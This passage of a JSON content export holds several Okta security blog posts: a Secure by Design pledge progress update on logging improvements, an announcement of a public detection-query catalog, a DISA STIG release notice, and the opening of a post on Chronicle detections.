pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. 
We recommend reading the table provided in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/cisasecurebydesign1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"half-yearly update\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta made measurable improvements to logging of both the Okta and Auth0 platforms, which are detailed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now includes over 1000 unique events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security 
personnel can generate queries for new events related to Okta Desktop MFA, Okta Privileged Access, Okta Identity Governance, Identity Verification, Enhanced Disaster Recovery, Device Assurance, Identity Threat Protection, Workflows and Universal Directory.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root session and token context\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in all relevant System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can easily group all interactive user events to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" property and all calls made using a given API token to a rootApiTokenId property\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration changes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" included as a property in the target object of all relevant System Log 
events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel can use the changeDetails property to quickly identify in System Log the prior and current state when administrators modify critical policy settings (IdP, directory agent, password policies, authentication policies etc.). \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/reports/mfa-abandonment.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA abandonment \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"events added to System Log\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators and security personnel are better able to troubleshoot technical issues or MFA Fatigue attacks.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 System Log 
Improvements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admins can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create and modify thresholds\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for notifications in Auth0 Security Center\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can set thresholds for suspicious activity above which alerts can be configured, ensuring a prompt response to genuine incidents and fewer false alarms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#1Yusq2sGxZU8e0ek2VQKfK\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Dashboard Session 
Management\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can manually revoke a user’s sessions from the management console.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prioritized Log Streams\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can optimize the performance of security-relevant events over others.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Final word\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From the moment we signed the CISA Secure by Design pledge, Okta’s Product, Engineering and Security teams were enthusiastic about tackling this important work. The pledge was highly aligned with one of Okta’s four core values (“Always Secure, Always On.”). 
And every Okta employee is incentivized to lean into our security program under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - our long-term initiative to lead the industry in the fight against Identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One key benefit of CISA’s approach was in asking signatories to demonstrate progress. This meant that even in areas where our controls were mature, we could still challenge the business to demonstrate further improvements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the more challenging conversations was around our “definition of done” for some of these programs. We observed that the quantum of effort required to close out the final 5-10% of coverage for any given control almost always required more resources than the first 90-95%. The support required to manage exception processes and the engineering required to handle edge use cases was the most taxing on our teams. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the ambitious milestones we put forward, I’m very proud of all the people at Okta who collaborated, made concessions, and, in many cases, innovated to help meet our Secure by Design pledge goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As mentioned at the halfway point in this exercise, Secure by Design is never “done.” Okta is passionate about security - especially the security features all cloud applications need to support - to meet our larger, more ambitious goal of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eliminating identity-based attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"A one-year progress update on Okta's commitment to the CISA Secure by Design Pledge."},"updatedAt":"2025-05-28T16:02:25.114Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. 
He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2025/05/leveraging-okta-syslogs-for-proactive-threat-detection","id":"f142328d-069a-522a-b0ca-7963b254a834","title":"Leveraging Okta System Logs for Proactive Threat Detection","date":"2025-05-20T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is thrilled to announce the launch of our Customer Detection Catalog, a repository of detection queries designed to help Okta customers proactively identify and respond to potential security threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This publicly accessible GitHub repository, found at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/okta/customer-detections\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offers a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious 
activities ranging from anomalous user behavior and potential account takeovers to misconfigurations and emerging attack patterns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these detections were built while analyzing real cyber threats against Okta tenants. The detections also contain preventative configurations Okta administrators can implement to proactively mitigate the threat that’s being detected. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When paired with the broader \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta event library\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (numbering over 1000 events), the Okta Customer Detection Catalog is a versatile resource designed to provide SOC analysts with readily usable queries to integrate into their monitoring and alerting workflows, enabling faster identification of potential incidents. It also offers threat hunters a foundation for building and customizing more sophisticated detection rules tailored to their specific environment and risk appetite. 
Detailed descriptions of security-relevant log fields are also available to help security analysts interpret logs during an investigation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are a few example detections that highlight the potential of the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Impossible Travel with New Device\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": This detection looks for authentication events originating from geographically distant locations within a short timeframe, coupled with the use of a previously unseen device for the user. This can be a strong indicator of account takeover.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Okta Administrator Activity: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Unusual activity conducted by an administrator such as deactivating all other super administrators to prevent response, disabling log streams to prevent detection, or downgrading MFA on authentication policies. 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Access from Tor Exit Nodes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Identifying access attempts to sensitive applications originating from Tor exit nodes can flag potentially anonymized and suspicious activity.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Queries vs. Hunting Queries\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The repository makes a distinction between detection queries and hunting queries, both of which reside in different folders within the catalog:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection queries are designed for continuous monitoring and alerting. They are typically more specific and aim to identify high-confidence indicators of malicious activity or policy violations. When a detection query triggers, it ideally generates an alert for immediate investigation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting queries are more exploratory and are used for proactive investigations. They might look for broader patterns or anomalies that don't necessarily trigger immediate alerts but warrant further analysis by a threat hunter. 
Hunting queries can help uncover stealthy or sophisticated attacks that might evade standard detections.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers should baseline these detections against their environment and filter out business-approved processes that may cause false positives. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your Contribution Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe that by sharing knowledge and expertise, our whole community can become more resilient against evolving threats. The community-driven nature of the catalog allows for the rapid dissemination of detection strategies for newly identified vulnerabilities and attack techniques.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We actively encourage customers to contribute their own detection ideas to this growing repository. If you see a gap in our current coverage, or find any issues, open a GitHub Issue to have it addressed. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To contribute new detection ideas, create a GitHub issue and include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What activity is the idea attempting to detect? 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can this be leveraged by an adversary?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What MITRE ATT&CK TTP does it map to?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Add the detection query/logic.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicate whether you would like to be credited as the author.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Happy hunting!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brett Winterford contributed to this post.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Introducing the Okta Security Detection Catalog, a repository of detection queries designed to help Okta customers."},"updatedAt":"2025-05-22T00:26:15.598Z","secAuthor":[{"id":"e683d13a-ed28-56b7-9833-acd324958d57","bio":{"bio":"<p> </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1FhhWswwLeruUBeNL52hJN/0070be7651dcf4881a1b2e624a5beb28/IMG_0083.jpg"},"name":"Ryan Mombourquette","jobTitle":"Detection and Response Engineer","slug":"/hackers/ryan-mombourquette","node_locale":"en"}]},{"slug":"/articles/2025/05/oktas-new-stig","id":"0e97e210-79c2-50a3-83e8-0a4e7e2cd924","title":"Okta's new Security Technical Implementation Guide 
(STIG)","date":"2025-05-09T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In cybersecurity, identity is the first line of defense. As the number of applications and systems increases, the fatigue of the cyber workforce increases in parallel. Exacerbating this is the increased responsibility on customers to create secure baselines where none exist.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Securing Baselines\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In an effort to create secure baselines, organizations like the Defense Information Systems Agency (DISA) have built publicly available guidance in the form of DISA Security Technical Implementation Guides (STIG). STIGs and Security Requirements Guides for the Department of Defense (DOD) information technology systems are mandated by DODI 8500.01 and provide benefits across the industry. This guidance bridges the gap between the National Institute of Standards and Technology (NIST) Special Publication 800-53 and Risk Management Framework (RMF). 
STIGs offer significant benefits for improving IT system security, compliance and resilience.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta and DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta recently announced \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/announcement/disa-releases-the-okta-idaas-security-technical-implementation-guide/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"our partnership with DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which has resulted in the release of the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG). \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"While this STIG is specific to Okta platforms, the integrations and hardening guidance are standards-based and can be used on any identity platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"An industry leader in Identity and Access Management (IAM), Okta is interoperable with various identity platforms and applications, which improves the ease of use when referencing the Okta STIG as a basis for other similar products in today's technological marketplace.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"first identity vendor to provide this level of configuration guidance\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", we look forward to continuing our relationship with DISA. 
By raising the bar for the industry, we're helping create the strongest and most secure guidance possible for securing not only the Okta platforms — but everything they connect to.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Call to Action\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With the release of this guidance, we encourage all of our customers to evaluate their Okta orgs against the STIG. While some checks such as \\\"banner notifications\\\" may not apply to commercial entities, the remainder of the checks include recommendations for the most secure configuration of the Okta platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) is available to download at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", search for Okta. If you have feedback on the STIG, please contact fedramp@okta.com.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta recently announced our partnership with DISA, which has resulted in the release of the Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) in an effort to secure baselines for the industry."},"updatedAt":"2025-05-09T15:00:07.712Z","secAuthor":[{"id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"<p>Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. 
Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech. </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg"},"name":"Rob Gil","jobTitle":"Sr. Director, Federal Architecture","slug":"/hackers/rob-gil","node_locale":"en"},{"id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"<p> Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. He has worked in cybersecurity since leaving the US Navy in the late 1990s. Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg"},"name":"Naveed Mirza","jobTitle":"Senior Solutions Architect","slug":"/hackers/naveed-mirza","node_locale":"en"},{"id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"<p> Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. 
Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg"},"name":"Brandon Iske","jobTitle":"Principal Solutions Architect","slug":"/hackers/brandon-iske","node_locale":"en"}]},{"slug":"/articles/2023/08/telling-more-okta-detection-stories-google-chronicle","id":"057558a0-7d4f-55d4-ad76-5f33154b65c7","title":"Telling More Okta Detection Stories with Google Chronicle ","date":"2023-08-02T17:42:12+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Robust protection comes from layers, and many of you are already familiar with the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://en.wikipedia.org/wiki/Swiss_cheese_model\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Swiss Cheese Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Simply stated, even when you're confident in your primary controls, that confidence only grows with each additional layer added. Because who wants to have a defense that’s built around a single slice of sad cheese, wrapped in a pitiful film of plastic? 
